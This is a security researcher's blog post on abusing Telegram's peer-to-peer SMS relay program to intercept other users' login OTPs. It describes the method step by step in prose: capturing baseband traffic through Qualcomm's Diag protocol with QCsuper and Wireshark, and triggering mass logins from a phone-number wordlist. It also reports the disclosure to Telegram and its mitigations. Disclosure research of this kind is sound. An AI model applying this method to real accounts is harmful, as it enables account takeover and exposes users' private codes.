How I could steal Telegram OTPs using SMS relays

In this article, I will discuss SMS relays for mobile applications, how they can be abused to steal other users’ OTPs, and provide a practical example of stealing Telegram OTPs.

A One-Time Password (OTP) is a unique code that is valid for a short period and can only be used once to verify your identity when logging into an application or performing sensitive operations, such as making a purchase or changing your password.

The term “SMS relays” is often associated with GSM remote controllers, like the one shown in this picture:

However, I will not discuss this type of SMS relay. Instead, I will focus on software-based SMS relays. Sometimes, companies face challenges in sending OTPs reliably and cost-effectively to their users due to restrictions imposed by enterprise SMS operators in certain countries.

To ensure that all users receive OTPs reliably, one solution is to use the phone numbers (devices) of some users as relays for delivering OTPs to other users. When a user receives a message, it appears to come from a regular phone number, which is actually the number of the SMS relay. Companies like LinkedIn and Telegram use this approach with their Peer-to-Peer Login (P2PL) program.

Below is a simple diagram explaining how P2PL works in Telegram.

When Telegram first announced the Peer-to-Peer Login (P2PL) program, many people criticized it for privacy violations, as it exposed the phone numbers of Telegram users.

Another significant issue that wasn’t widely discussed is the potential for abusing this feature to steal OTPs and take over user accounts.

How can this be done? One method is to capture the GSM traffic when the device is relaying the OTP to its destination. However, this is difficult because GSM traffic is encrypted. If we capture GSM traffic using Software-Defined Radio (SDR), we can’t view its contents due to this encryption.

For more information about cracking GSM traffic, check out this video.

Fortunately, devices such as phones and dongles equipped with Qualcomm processors expose a special protocol called the Diag protocol or Diagnostic Monitor. This protocol communicates with the device’s baseband and allows us to capture raw mobile network packets for various protocols, both before encryption and after decryption.

A tool that can be used for this purpose is QCsuper by P1 Security. All you need is a PC with the QCsuper tool, Wireshark, ADB, a rooted Android phone with a Qualcomm processor, and debug mode enabled from the developer options. The tool is more stable on older Android phones; for this experiment, I used a Samsung Galaxy S4.

For more information about reading and analyzing packet captures of various mobile network protocols with Wireshark, check out this article.

Let’s now get into the experiment with Telegram, to perform this attack we first need to log into the P2PL program, after that you will have a screen similar to this:

By doing this, you give Telegram app the permission to send SMS and allow them to use your device as an SMS relay in exchange for a Telegram premium subscription.

The next step is to run the QCsuper tool with the setup discussed earlier then we need to log in with many valid Telegram accounts using phone numbers from a wordlist, we can use Telegram’s web app or any Telegram APIs used for login, this will make Telegram send OTPs to the target users, and will increase the chance that an OTP will be relayed using our device.

This can only be done in a country where Telegram had to support P2PL due to SMS issues, and where there are few P2PL members so the chances to choose our device as a relay are high.

If we are lucky enough, we will see the OTP appearing in Wireshark as follows:

We are interested in the GSM SMS protocol packets ( I think that it will appear the same way for SMS over 2G/3G/4G ), and precisely the ones that have a TPDU (Transfer Protocol Data Units) with SMS-SUBMIT (TP-MTI=01) message type, this will only show the SMS messages that are sent from the device.

you can use the following Wireshark filter:

In the packet details, the fields that interest us in this case are TP-Destination-Address for the number of the target user ( the OTP final recipient ) and the TP-User-Data that contains the SMS message, to automate the retrieval of this information, we can use a CLI network traffic analyzer like Tshark and save the phone:OTP combinations in a file then use that file to submit the OTPs.

After sending an email to the security team at Telegram about this, they said in a part of their email:

although a P2PL member can have other users' OTPs, they or anyone else except the initial user won’t be able to use them due to specific
server-side restrictions.

Those restrictions may be some IP or device fingerprinting check.

If these restrictions weren’t in place, this approach could be used to steal OTPs and gain unauthorized access to accounts. Any software that uses SMS relays to send OTPs should implement such server-side restrictions, along with additional measures like root detection.

I also find that QCsuper is a valuable tool for mobile pentesting and security research, as it allows capturing raw mobile communication traffic. So, mobile pentesters should definitely include it in their toolkit.